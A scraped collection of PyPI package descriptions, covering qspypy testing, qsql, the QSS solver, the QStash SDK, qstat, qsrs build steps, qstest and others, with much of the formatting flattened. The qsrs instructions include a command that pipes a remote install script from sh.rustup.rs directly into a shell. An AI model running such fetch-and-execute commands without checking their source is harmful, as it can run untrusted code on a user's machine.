qutest.current_obj(QS_OBJ_KIND.SM_AO, 'AO_Philo<2>')\n\n\ndef test_TIMEOUT_Philo_post(qutest):\n qutest.post('TIMEOUT_SIG')\n qutest.expect(\"%timestamp AO-Post Sdr=QS_RX,Obj=AO_Philo<2>,Evt,Evt Obj=AO_Philo<2>,Sig=TIMEOUT_SIG,State=thinking\")\n qutest.expect(\"===RTC===> St-Exit Obj=AO_Philo<2>,State=thinking\")\n qutest.expect(\"===RTC===> St-Entry Obj=AO_Philo<2>,State=hungry\")\n qutest.expect(\"%timestamp ===>Tran Obj=AO_Philo<2>,Sig=TIMEOUT_SIG,State=thinking->hungry\")\n qutest.expect(\"%timestamp Trg-Done QS_RX_EVENT\")\n\ndef test_publish_EAT_2(qutest_noreset): \n qutest = qutest_noreset # Rename for consistancy\n qutest.loc_filter(QS_OBJ_KIND.SM_AO, 'AO_Philo<2>')\n qutest.publish('EAT_SIG', struct.pack('< B', 2)) # Send byte of value 2\n qutest.expect(\"%timestamp AO-Post Sdr=QS_RX,Obj=AO_Philo<2>,Evt,Evt Obj=AO_Philo<2>,Sig=EAT_SIG,State=hungry\")\n qutest.expect(\"%timestamp BSP_CALL BSP::random 123\")\n qutest.expect(\"===RTC===> St-Entry Obj=AO_Philo<2>,State=eating\")\n qutest.expect(\"%timestamp ===>Tran Obj=AO_Philo<2>,Sig=EAT_SIG,State=hungry->eating\")\n qutest.expect(\"%timestamp Trg-Done QS_RX_EVENT\")NOTEIn order to send arbitrary binary packet data, Python'sstructclass can be used.For example:qutest.dispatch('EAT_SIG', struct.pack('< B', 2))Configurion and Running TestsIn order to run a python qutest script, you need to provide a standard pytestconftest.pyconfiguration file. 
This file needs no modifications to use the\nnew qutest command line tool.The file must contain the following at a minimum:#\n# pytest configuration file\n#\n\n# Load common fixtures used throughout testing\nfrom qspypy.fixtures import session, reset, module, qutest, qutest_noresetAlternatively, this file can be modified to change the behavior of qutest by\nmodifying its configuration.For example, to have the qspy backend start automatically, add the following:# Load default configuration so we can change it before running\nimport qspypy.config as CONFIG\n\n# Automatically start/stop qspy for the session\nCONFIG.AUTOSTART_QSPY = True\n\n## NOTE: You must change this to be the port your target is connected to\nCONFIG.QSPY_COM_PORT = 'COM3'Test executionThe qspypy package creates a system wide executablequtestthat provides\nthe identical interface at the existing qutest.tcl script.For example, to run all of the dpp mingw example test scripts you would enter\nthe following terminal command in /examples/qutest/dpp:qutest *.py mingw/test_dpp.exeWhich produces the following output:============================= test session starts =============================\nplatform win32 -- Python 3.6.4, pytest-3.6.1, py-1.5.3, pluggy-0.6.0 -- c:\\tools\\python\\python36\\python.exe\ncachedir: .pytest_cache\nrootdir: C:\\tools\\qp\\qpcpp_6.3.2\\examples\\qutest\\dpp, inifile:\ncollected 8 items\n\ntest_philo.py::test_TIMEOUT_Philo_post PASSED [ 12%]\ntest_philo.py::test_publish_EAT_2 PASSED [ 25%]\ntest_philo.py::test_TIMEOUT_Philo_thinking_ASSERT PASSED [ 37%]\ntest_philo.py::test_TIMEOUT_Philo_eating_PUBLISH_from_AO PASSED [ 50%]\ntest_philo.py::test_timeEvt_Philo_tick PASSED [ 62%]\ntest_table.py::test_PAUSE_Table PASSED [ 75%]\ntest_table.py::test_SERVE_Table_1 PASSED [ 87%]\ntest_table.py::test_SERVE_Table_2 PASSED [100%]\n\n========================== 8 passed in 10.13 seconds ==========================Known IssuesSupport for config.AUTOSTART_QSPY mac not testedPotential issue with dropped characters on linuxRelease Notes1.1.0Added missing qutest: fill, peek, pokeAdded command line toolqutestpywhich is interface compatible with existing\nqutest.tcl script.Added command line toolqutestpy_convertto convert tcl scripts to python.Fixed bug with missing setup and teardown calls.Qutest will no longer show a console for local targets, this can be changed by\nsetting LOCAL_TARGET_USES_CONSOLE to True.Added new configuration QSPY_LOCAL_UDP_PORT to specify local UDP port.Simplifed test fixtures to just require qutest or qutest_noreset.Added reset, setup and teardown callbacks via registration in module fixture.No longer kills local_target process but relies on reset message only.Added remaining test examples1.0.1Fixed crash on linuxAdded config.AUTOSTART_QSPY support for linux via gnome-terminalNow defaults to config.AUTOSTART_QSPY to False1.0.0Initial release to PyPiSource File DescriptionFileDescriptonconfig.pyConfiguration values used in qutest.pyfixtures.pypytest fixtures to used in the user's conftest.pyqspy.pyThe Python implementation of the qspy.tcl qspy interface libraryqutest.pyThe Python implementaition of qutest.tclqutest_convert.pyCommand line tool for file Tcl to Python conversiontestsDirectory containing Python versions of test scripts"} +{"package": "qsql", "pacakge-description": "PyQuickSQLFor a more thorough explanation seeexample.ipynbHow to use the query loader:importquicksqlasqqqueries=qq.LoadSQL('path/to/queries.sql')Printing the queries should give you something like 
this:LoadSQL('path/to/queries.sql')\nQuery Name: examplequery_1, Params: order_avg, num_orders\nQuery Name: examplequery_2, Params: sdate, edate, product_idThese are callable objects that return the string given the non-optional **params.They are equivalent to an f-string + a lambda but loaded from an sql file and stored in the LoadSQL object.print(str(queries))will give you the raw SQL string.How to use them:print(queries.examplequery_2(product_id=10,sdate='1-10-2022',edate=qq.NoStr(\"DATE'4-11-2023'\"),something_not_a_param='test'))Unused variables: something_not_a_param in query examplequery_2Above will be printed as a warning with invalid inclusions, no non-verbose option yet.SELECTc.CustomerName,o.OrderDate,o.Status,(SELECTSUM(od.Quantity*od.UnitPrice)FROMOrderDetailsodWHEREod.OrderID=o.OrderID)ASTotalValueFROMCustomerscINNERJOINOrdersoONc.CustomerID=o.CustomerIDWHEREo.OrderDateBETWEEN'1-10-2022'ANDDATE'4-11-2023'ANDEXISTS(SELECT1FROMOrderDetailsodWHEREod.OrderID=o.OrderIDANDod.ProductID=10)ORDERBYTotalValueDESC;How to use the file cache:This is very similar to functool'scache, with the main difference being that@qq.file_cachecaches the asset to memory\nand to you system's default temporary directory. If the memory cache ever fails (eg a restarted kernel) it will load the asset from it's pickled file.fromrandomimportrandintimportquicksqlasqq@qq.file_cache()deftest_mem(size:int):return[randint(0,10)for_inrange(size)]print(test_mem(8))[10, 3, 4, 9, 2, 2, 4, 2]print(test_mem(8))[10, 3, 4, 9, 2, 2, 4, 2]To clear the cache:qq.clear_cache()For more examples and how to configure seeexample.ipynb"} +{"package": "qsqla", "pacakge-description": "qsqla===============================[![Build Status](https://travis-ci.org/blue-yonder/qsqla.svg?branch=master)](https://travis-ci.org/blue-yonder/qsqla)qSQLA is a query builder for SQLAlchemy Core SelectablesInstallation / Usage--------------------To install use pip:$ pip install qsqlaOr clone the repo:$ git clone https://github.com/blue-yonder/qsqla.git$ python setup.py installExample-------```pythonfrom sqlalchemy import create_engine, MetaData, Table, Column, Integer, Stringdb = create_engine(\"sqlite:////:memory:\")md = MetaData(bind=db)table = Table('user',md,Column('id', Integer, primary_key=True),Column('name', String(16), nullable=False),Column('age', Integer))sel = table.select()from qsqla.query import query, build_filtersfilter = build_filters({\"id__eq\":1})stm = query(sel, filter)```"} +{"package": "qs-qrcode", "pacakge-description": "install:pip install qs-qrcodeusageuse in cmd:qsqrcode-lH-m\u5531\u6b4c\u4e0d\u5982\u8df3\u821e-s400-b20-c#569932or if you did not install with pip:pythonqsqrcode.py-lH-m\u5531\u6b4c\u4e0d\u5982\u8df3\u821e-s400-b20-c#569932and for more usage:qsqrcode-huse in python:fromqsqrcode.qrcodeimportQrcodeqr=Qrcode('test it')qr.generate('testpic/test.png')more usagefromqsqrcode.qrcodeimportQrcode# Qrcode \u7684\u7b2c\u4e8c\u4e2a\u53c2\u6570\uff0cL \u2248 7%\u5bb9\u9519\uff0cM \u2248 15%\u5bb9\u9519\uff0cQ \u2248 25%\u5bb9\u9519\uff0cH \u2248 
30%\u5bb9\u9519Qrcode('test','L').generate('testpic/test7.png')Qrcode('test','M').generate('testpic/test8.png')Qrcode('test','Q').generate('testpic/test9.png')Qrcode('test','H').generate('testpic/testA.png')Qrcode('\u586b\u5145\u989c\u8272','H').colour('#1294B8').resize(250).generate('testpic/test1.png')Qrcode('\u586b\u5145\u56fe\u7247','H').paint('pic/testbg.jpg').resize(250).generate('testpic/test2.png')Qrcode('\u518d\u770b\u770b\u5982\u4f55\u52a0border','H').paint('pic/test.jpg').resize(230).set_border(10).generate('testpic/test3.png')Qrcode('\u6d4b\u8bd5\u4e8c\u7ef4\u7801\u4e2d\u95f4\u52a0\u5165\u56fe\u7247','H').put_img_inside('pic/mystic.png').resize(375).generate('testpic/test4.png')Qrcode('gif\u8bd5\u8bd5\u770b\uff0c\u4f46\u6548\u679c\u5e76\u4e0d\u597d\u770b\uff0c\u800c\u4e14\u6682\u4e0d\u652f\u6301set_border','H').fill_gif('pic/pla.gif').resize(250).generate('testpic/testD.gif')"} +{"package": "qsr", "pacakge-description": "Simple Quick Screen RecordQuick Screen Record is The software that can help you record screen quickly.Usagefirst, install qsr, just typepip install qsron your terminalsecond, typeC:\\Users\\USER\\AppData\\Local\\Programs\\Python\\Python39\\Lib\\site-packages\\qsr\\qsr.pyon your terminal to run the softwarelast, just follow what the command say, and yeah, now you can use itRequirementOperating systemx64 bitProcessorDisplay1280 x 960 - 1920 x 1080OtherSupportFollow Us On\u00c2\u00a92021 R Stu Team \u00e2\u201d\u201a All Right Reserved."} +{"package": "qs-regression-model", "pacakge-description": "Example regression model package for QA sharing demo."} +{"package": "qsrs", "pacakge-description": "qsrs: qsearch Rust implementationThis is a (partial) implementation of the algorithm described in the paperHeuristics for Quantum Compiling with a Continuous Gate Set.\nHowever, re-writing in Rust has provided up to a 20x speedup in compilation time.\nAt some future point, this project will be usable as a stand-alone Rust program that will be able\nto compile quantum circuits.There are Python bindings to the Rust code that are used in the qsearch package. These\nshould automatically be installed from PyPi when you install qsearch.Installingqsrsis available on PyPi:pip3 install qsrsIf you would like to build from source see \"Building and Installing\" below.Supported gatesThe current list of \"gates\" supported is:IdentityX90ZX90Z (combined for performance reasons)IBM U3KroneckerProductX, Y, ZAny constant, unparameterized gate such as CNOTThis list will likely grow as needed.Building and InstallingIf you are on a 64 bit macOS, Windows, or Linux, you can install viapip3 install qsrs.You can also install from source.LinuxMake sure the version of pip you have is at least 20.0.2.\nYou can check viapip -Vand upgrade viapython3 -m pip install -U pip.First, install the dependencies. On modern Debian based machines you should be able to install the dependencies like the following,\nnote that the version of libgfortran-10-dev may be different.sudo apt install libopenblas-dev libceres-dev libgfortran-10-devOnce that is complete you should then install Rust like as follows:curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | shAccept all of the default prompts. You probably want tosource ~/.cargo/env, then switch to the nightly toolchain:rustup default nightlyThen you can enter theqsrsdirectory and runpip install .This will take a while. 
Once it is done, verify that the installation succeeded by runningpython3 -c 'import qsrs'It should not print anything out nor give any error.On Linux, you can also build wheels with Docker, staticly linking a custom builtopenblas.\nIncidently, this is how the packages on PyPi are built.Install dockerhttps://docs.docker.com/install/Run the container to build wheels:docker run --rm -v $(pwd):/io ethanhs/maturin-manylinux-2010:0.6 build --cargo-extra-args=\"--no-default-features --features python,static,rustopt\" --release --manylinux 2010 --no-sdistInstall the correct wheel for your Python version intarget/wheels(e.g.qsrs-0.13.0-cp37-cp37m-manylinux2010_x86_64.whlfor Python 3.7)MacOSMake sure the version of pip you have is at least 20.0.2.\nYou can check viapip -Vand upgrade viapython3 -m pip install -U pip.First, install the dependencies. We use homebrew here, which is what we build the official package against.brew install gcc ceres-solverOnce that is complete you should then install Rust like as follows:curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | shAccept all of the default prompts. You probably want tosource ~/.cargo/env, then switch to the nightly toolchain:rustup default nightlyThen you can enter theqsrsdirectory and run the following to build a wheel linking to Apple's Acceleratematurin build -i python --cargo-extra-args=\"--no-default-features --features=accelerate,python,rustopt,ceres/system\" --release --no-sdistThis will take a while. Once it is done, install the wheel likepip3 install target/wheels/qsrs-0.15.1-cp38-cp38-macosx_10_7_x86_64.whlNote the name of the wheel may be slightly different depending on your Python version, but it should be the only wheel in thetarget/wheels/folder.Verify that the installation succeeded by runningpython3 -c 'import qsrs'It should not print anything out nor give any error.WindowsMake sure the version of pip you have is at least 20.0.2.\nYou can check viapip -Vand upgrade viapython3 -m pip install -U pip.Download and install rust via the installer found athttps://rustup.rs/. Accept all of the defaults.Close your shell and open a new one (this updates the enviroment). Then runrustup default nightlyThen installcargo-vcpkg, which will help install dependencies for us. You can install it viacargo install cargo-vcpkgcargois installed with Rust so this should work.Then in the qsrs folder, runcargo vcpkg buildThis will likely take a while.Once it is done, build a wheel viamaturin build -i python --cargo-extra-args=\"--no-default-features --features python,static,rustopt\" --release --no-sdistThen you should be able to install the generated wheel package likepip install -U target\\wheels\\qsrs-0.15.1-cp37-none-win_amd64.whlNote the name of the wheel may be slightly different depending on your Python version, but it should be the only wheel in thetarget/wheels/folder.Verify that the installation succeeded by runningpython3 -c 'import qsrs'It should not print anything out nor give any error.UsagePlease see theqsearchwikifor how to use this with qsearch.\n`Testing and ContributingTo run the tests, clone the repo then run:$ pip install .\n$ pip install -r ../test-requirements.txt\n$ cd .. 
&& pytestLicenseSince NLOpt's L-BFGS implementation is LGPL licensed, if therustoptfeature is enabled\n(it is enabled by default), qsrs is LGPL licensed as it statically links to NLOpt.\nIf you disable therustoptfeature, then the combined work is BSD 3 clause licensed.In addition, if you disablerustopt, you can still enable theceresfeature for a BSD-3\nlicensed product, but since this crate is usually dynamically linked in the end, it doesn't\nreally matter.\nPlease see LICENSE for more information."} +{"package": "qss", "pacakge-description": "QSS: Quadratic-Separable SolverQSS solves problems of the form$$\\begin{equation*} \\begin{array}{ll} \\text{minimize} & (1/2) x^T P x + q^T x + r + g(x) \\\\ \\text{subject to} & Ax = b \\end{array} \\end{equation*}$$where $x \\in \\bf{R}^n$ is the decision variable being optimized over. The\nobjective is defined by a positive definite matrix $P \\in \\bf{S}^n_+$, a vector\n$q \\in \\bf{R}^n$, a scalar $r \\in \\bf{R}$, and a $g$ that is separable in the\nentries of $x$, i.e., $g$ can be written as\n$$g(x) = \\sum_{i=1}^n g_i(x_i).$$\nThe constraints are defined by a matrix $A \\in \\bf{R}^{m \\times n}$ and a vector\n$b \\in \\bf{R}^m$.To use QSS, the user must specify $P$, $q$, $r$, $A$, $b$, as well as the $g_i$ from a built-in collection of separable functions.Installationpip install qssUsageAfter installingqss, import it withimportqssThis will expose the QSS class which is used to instantiate a solver object:solver=qss.QSS(data)Use thesolve()method when ready to solve:results=solver.solve(eps_abs=1e-5,eps_rel=1e-5,alpha=1.4,rho=0.1,max_iter=np.inf,precond=True,warm_start=False,reg=True,use_iter_refinement=False,verbose=False,)Parametersdata: dictionary with the following keys:'P','q','r','A','b'specify the quadratic part of the objective and the linear constraint as in the problem formulation above.'P'and'A'should bescipy.sparseCSC matrices or QSSLinearOperators (see below),'q'and'b'should benumpyarrays, and'r'should be a scalar.'A'and'b'can be excluded fromdataor set toNoneif the linear equality constraints are not needed.'g'is a list of separable function definitions. Each separable function is declared as a dictionary with the following keys:'g': string that corresponds to a valid separable function name (see below for a list of supported functions).'args':'weight'(default 1),'scale'(default 1),'shift'(default 0) allow the'g'function to be applied in a weighted manner to a shifted and scaled input. Some functions take additional arguments, see below.'range': tuple specifying the start index and end index that the function should be applied to.Note that the zero function will be applied to any indices that don't have another function specified for them.eps_abs: scalar specifying absolute tolerance.eps_abs: scalar specifying relative tolerance.alpha: scalar specifying overstep size.rho: scalar specifying ADMM step size.max_iter: maximum number of ADMM iterations to perform.precond: boolean specifying whether to perform matrix equilibration.warm_start: boolean specifying whether to warm start upon a repeat call ofsolve().reg: boolean specifying whether to regularize KKT matrix. May fail on certain problem instances if set toFalse.use_iter_refinement: boolean, only matters ifregisTrue. 
Helps mitigate some of the accuracy loss due to regularization.verbose: boolean specifying whether to print verbose output.ReturnsA list containing the following:objective: the objective value attained by the solution found byqss.solution: the solution vector.Separable functionsThe following convex separable functions are supported ( $\\mathcal{I}$ is the $\\{0, \\infty\\}$ indicator function):FunctionParameters$g_i(x)$zero$0$abs$|x|$is_pos$\\mathcal I(x \\geq 0)$is_neg$\\mathcal I(x \\leq 0)$is_boundlb: lower bound (default 0),ub: upper bound (default 1)$\\mathcal I(l \\leq x \\leq u)$is_zero$\\mathcal I(x = 0)$pos$\\max\\{x, 0\\}$neg$\\max\\{-x, 0\\}$quantiletau: scalar in $(0, 1)$$0.5 |x| + (\\tau - 0.5) x$huberM: positive scalar$x^2 \\text{ if } |x| \\leq M, 2M|x| - M^2 \\text{ else}$The following nonconvex separable functions are supported:FunctionParameters$g_i(x)$card$0$ for $x = 0$; $1$ for $x \\neq 0$is_int$\\mathcal I(x \\text{ is an integer})$is_finite_setS: Python list of scalars$\\mathcal I(x \\in S)$is_bool$\\mathcal I(x \\in \\{0,1\\})$Thet(weight),a(scale),b(shift) parameters are used to shift and scale the above as follows:t * g(ax - b).ExampleApplying the Huber function to a shifted version of the first 100 entries:[{\"g\":\"huber\",\"args\":{\"M\":2,\"shift\":-5},\"range\":(0,100)}]Abstract linear operatorsQSS comes with built-in support for abstract linear operators via theqss.linearoperator.LinearOperatorclass (hereafter referred to simply asLinearOperator).The easiest way to build aLinearOperatoris via its constructor. The argument to the constructor should be a list of lists representing a block matrix, in which each block is one of the following:SciPy sparse matrix orscipy.sparse.linalg.LinearOperatororqss.linearoperator.LinearOperatororNone.As an example, a constraint matrixAcould be built as follows:fromqss.linearoperatorimportLinearOperatorA=LinearOperator([[None,F,-I],[I,I,None]])WhereFis ascipy.sparse.linalg.LinearOperatorthat implements the Fourier transform andIis a SciPy sparse identity matrix.There are several helper functions available to facilitate the creation ofLinearOperators, all accessible throughqss.linearoperator:block_diag(D): Returns a block diagonalLinearOperatorfromD, a list of linear operators (SciPy sparse matrix,scipy.sparse.linalg.LinearOperator, orqss.linearoperator.LinearOperator).hstack(D): Horizontally concatenates list of linear operatorsDinto a singleLinearOperator.vstack(D): Vertically concatenates a list of linear operatorsDinto a singleLinearOperator.Left and right matrix multiplication between aLinearOperatorand a NumPy array is supported. Multiplication betweenLinearOperators is currently not supported. Matrix-vector multiplication between aLinearOperatorFand a NumPy arrayvcan be achieved withF.matvec(v)orF @ v. Multiplication with the adjoint ofFcan be achieved withF.rmatvec(v)orv @ F.Note that solve times may be slower whenLinearOperators are involved. If eitherPorAis aLinearOperator, the linear KKT system central to the QSS algorithm is solved indirectly, as opposed to directly via a factorization.ExampleNonnegative least squares is a problem of the form$$\\begin{equation*} \\begin{array}{ll} \\text{minimize} & (1/2) \\Vert Gx - h \\Vert_2^2 \\\\ \\text{subject to} & x \\geq 0. 
\\end{array} \\end{equation*} $$qsscan be used to solve this problem as follows:importnumpyasnpimportscipyasspimportqssp=100n=500G=sp.sparse.random(n,p,density=0.2,format=\"csc\")h=np.random.rand(n)data={}data[\"P\"]=G.T@Gdata[\"q\"]=-h.T@Gdata[\"r\"]=0.5*h.T@hdata[\"g\"]=[{\"g\":\"is_pos\",\"range\":(0,p)}]# Enforce x >= 0solver=qss.QSS(data)objective,x=solver.solve()print(objective)DevelopmentTo create a virtual environment, runpython3 -m venv envActivate it withsource env/bin/activateClone theqssrepository,cdinto it, and installqssin development mode:pip install -e ./ -r requirements.txtFinally, test to make sure the installation worked:pytest tests/"} +{"package": "qss-debugger", "pacakge-description": "No description available on PyPI."} +{"package": "qssimport", "pacakge-description": "qssimportqssimport allows you to use multiple qt stylesheet files for a single project by merging those stylesheets into a main qss file. Simply create a base .qss file that defines 1 or more @import statements that point to other stylesheets.Installationsudo pip install qssimportUsageThebase_diris the path to the stylesheetsTheimport_deffile is assumed to be stored in the stylesheets directoryimport_defis file where all of the @imports need to be definedThemain_stylesheetis an optional argument that defines the name of the compiled stylesheet.\nif a name is not provided, the program defaults to mainStyle.qssfrom qssimport import stylesheet\n...\napp = QApplication([])\n my_q_stylesheet = stylesheet.Stylesheet(base_dir='/path/to/stylesheets/',\n import_def_file='imports.qss',\n main_stylesheet='myStyle.qss')\napp.setStyleSheet(my_q_stylesheet.load_stylesheet())\n...ExampleGiven the following:import.qss@import \"lineEdit.qss\";\n@import \"widget.qss\";lineEdit.qssQLineEdit{color:#FFF;}\nQLineEdit{background:#A06;}widget.qssQWidget{background:#434343;}\nQWidget#MyWidget{background:#909090;}The file you specified asmain_stylesheetwill contain all of the lines fromlineEdit.qssandwidget.qssmyStyle.qssQLineEdit{color:#FFF;}\nQLineEdit{background:#A06;}\nQWidget{background:#434343;}\nQWidget#MyWidget{background:#909090;}"} +{"package": "qssp", "pacakge-description": "qsspA Python package for creating, manipulating and characterizing Quantum-State Stochastic Processes."} +{"package": "qstash-python", "pacakge-description": "Upstash Python QStash SDKQStashis an HTTP based messaging and scheduling solution for serverless and edge runtimes.QStash DocumentationUsageYou can get your QStash token from theUpstash Console.Publish a JSON messagefromupstash_qstashimportClientclient=Client(\"QSTASH_TOKEN\")client.publish_json({\"url\":\"https://my-api...\",\"body\":{\"hello\":\"world\"},\"headers\":{\"test-header\":\"test-value\",},})Create a scheduled messagefromupstash_qstashimportClientclient=Client(\"QSTASH_TOKEN\")schedules=client.schedules()schedules.create({\"destination\":\"https://my-api...\",\"cron\":\"*/5 * * * *\",})Receiving messagesfromupstash_qstashimportClient# Keys available from the QStash consolereceiver=Receiver({\"current_signing_key\":\"CURRENT_SIGNING_KEY\",\"next_signing_key\":\"NEXT_SIGNING_KEY\",})verified=receiver.verify({\"signature\":req.headers[\"Upstash-Signature\"],\"body\":req.body,\"url\":\"https://my-api...\",# Optional})Additional configurationfromupstash_qstashimportClientclient=Client(\"QSTASH_TOKEN\")# Create a client with a custom retry configuration. 
This is# for sending messages to QStash, not for sending messages to# your endpoints.# The default configuration is:# {# \"attempts\": 6,# \"backoff\": lambda retry_count: math.exp(retry_count) * 50,# }client=Client(\"QSTASH_TOKEN\",{\"attempts\":2,\"backoff\":lambdaretry_count:(2**retry_count)*20,})# Create Topictopics=client.topics()topics.upsert_or_add_endpoints(\"my-topic\",[{\"name\":\"endpoint1\",\"url\":\"https://example.com\"},{\"name\":\"endpoint2\",\"url\":\"https://somewhere-else.com\"}])# Publish to Topicclient.publish_json({\"topic\":\"my-topic\",\"body\":{\"key\":\"value\"},# Retry sending message to API 3 times# https://upstash.com/docs/qstash/features/retry\"retries\":3,# Schedule message to be sent 4 seconds from now\"delay\":4,# When message is sent, send a request to this URL# https://upstash.com/docs/qstash/features/callbacks\"callback\":\"https://my-api.com/callback\",# When message fails to send, send a request to this URL\"failure_callback\":\"https://my-api.com/failure_callback\",# Headers to forward to the endpoint\"headers\":{\"test-header\":\"test-value\",},# Enable content-based deduplication# https://upstash.com/docs/qstash/features/deduplication#content-based-deduplication\"content_based_deduplication\":True,})Additional methods are available for managing topics, schedules, and messages. See the examples folder for more.DevelopmentClone the repositoryInstallPoetryInstall dependencies withpoetry installCreate a .env file withcp .env.example .envand fill in theQSTASH_TOKENRun tests withpoetry run pytestand examples withpython3 examples/.pyFormat withpoetry run black ."} +{"package": "qstat", "pacakge-description": "The sungrid job submission framework known as`qsub`is a powerful tool to distribute your workload over many machines in parallel. To check the status of the jobs in the queue there is`qstat`which can print a human readable status table on the command line. Such status can be useful to keep track of your submitted compute jobs to e.g. prevent duplicate submission.This python qstat wrapper parses the jobs listed in`qstat-xml`into a list of dictionaries.Install with$ pip install qstatUsageGet python dictionaries descibing your`qsub`jobs.fromqstatimportqstatqueue_info,job_info=qstat()queue_info[13]{'@state':'running','JAT_prio':'0.55008','JAT_start_time':'2017-09-04T16:22:50','JB_job_number':'6384796','JB_name':'phs_obs_20120102_001','JB_owner':'relleums','queue_name':'test@isdc-cn11.astro.unige.ch','slots':'1','state':'r'}Add both`queue_info`and`job_info`to have one list of both running and waiting jobs:fromqstatimportqstatqueue_info,job_info=qstat()all_jobs=queue_info+job_infoforjobinall_jobs:print(job['JB_name'],'is',job['@state'])my_job_001 is running\nmy_job_002 is running\nmy_job_003 is runningor combine with e.g. 
with pandas DataFramefromqstatimportqstatq,j=qstat()importpandasaspddf=pd.DataFrame(q+j)df.tail()@state JAT_prio JAT_start_time JB_job_number JB_name \\\n190 pending 0.00000 NaN 6384973 phs_obs_20160102_002\n191 pending 0.00000 NaN 6384974 phs_obs_20160201_001\n192 pending 0.00000 NaN 6384975 phs_obs_20160201_002\n193 pending 0.00000 NaN 6384976 phs_obs_20160202_001\n194 pending 0.00000 NaN 6384977 phs_obs_20160202_002\n\n JB_owner JB_submission_time queue_name slots state\n190 relleums 2017-09-04T16:22:51 None 1 qw\n191 relleums 2017-09-04T16:22:51 None 1 qw\n192 relleums 2017-09-04T16:22:51 None 1 qw\n193 relleums 2017-09-04T16:22:51 None 1 qw\n194 relleums 2017-09-04T16:22:51 None 1 qw"} +{"package": "qstatistic", "pacakge-description": "==========qstatistic==========.. image:: https://img.shields.io/pypi/v/qstatistic.svg:target: https://pypi.python.org/pypi/qstatistic.. image:: https://img.shields.io/travis/yan-duarte/qstatistic.svg:target: https://travis-ci.org/yan-duarte/qstatistic.. image:: https://readthedocs.org/projects/qstatistic/badge/?version=latest:target: https://qstatistic.readthedocs.io/en/latest/?badge=latest:alt: Documentation Status.. image:: https://pyup.io/repos/github/yan-duarte/qstatistic/shield.svg:target: https://pyup.io/repos/github/yan-duarte/qstatistic/:alt: UpdatesPython Boilerplate contains all the boilerplate you need to create a Python package.* Free software: GNU General Public License v3* Documentation: https://qstatistic.readthedocs.io.Features--------* TODOCredits---------This package was created with Cookiecutter_ and the `audreyr/cookiecutter-pypackage`_ project template... _Cookiecutter: https://github.com/audreyr/cookiecutter.. _`audreyr/cookiecutter-pypackage`: https://github.com/audreyr/cookiecutter-pypackage=======History=======0.1.0.2 (2017-09-03)------------------* qSigmoid now accept a numpy array as input.* Made some tests for qSigmoid.0.1.0.1 (2017-08-31)------------------* First release on PyPI."} +{"package": "qstats", "pacakge-description": "qstatsQuery SGE batch job information"} +{"package": "q-stdev", "pacakge-description": "No description available on PyPI."} +{"package": "qstem-ase", "pacakge-description": "UNKNOWN"} +{"package": "qstest", "pacakge-description": "Python codes for the (q, s)-test, a significance test for individual communities in networks.Please citeKojaku, S. and Masuda, N. \"A generalised significance test for individual communities in networks\". 
Preprint arXiv: 1712.00298 (2017)\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014ContentsLICENSE - License of qstestREADME.md - README file for GithubREADME.txt - This README filesetup.py - Script for installing qstestrequirements.txt - List of libraries installed by setup.pytest.py - Test code for Travis CI.gitignore - Configuration file for GitHub.travis.yml - Configuration file for Travis CIqstest/ - Python codes for the (q, s)-test:qstest/__init__.py - Header fileqstest/cdalgorithm_wrapper.py - Codes for community-detection algorithmsqstest/qstest.py contains - Codes for the (q, s)-testqstest/quality_functions.py - Codes for calculating quality functions of a communityqstest/size_functions.py - Codes for calculating the size of a communityexamples/ - example codes:examples/example1.py - Usage of qstest with a built-in quality function, community-size function and community detection algorithmexamples/example2.py - Usage of qstest with a user-defined quality functionexamples/example3.py - Usage of qstest with a user-defined community-size functionexamples/example4.py - Usage of qstest with a user-defined community-detection algorithm\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014InstallationYou can install qstest with pip, a package management system for Python.To install, runpip install qstestIf this does not work, trypython setup.py install\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014Usagesg, p_values = qstest(network, communities, qfunc, sfunc, cdalgorithm, num_of_rand_net = 500, alpha = 0.05, num_of_thread = 4)Inputnetwork - Networkx Graph class instancecommunities - C-dimensional list of lists. communities[c] is a list containing the IDs of nodes belonging to community c. Node and community indices start from 0.qfunc - Quality of a community. The following quality functions are available:qmod - Contribution of a community to the modularityqint - Internal average degreeqexp - Expansionqcnd - ConductanceTo pass your quality function to qstest, see \"How to pass your quality function to qstest\" below.sfunc - Community-size function (i.e., size of a community). 
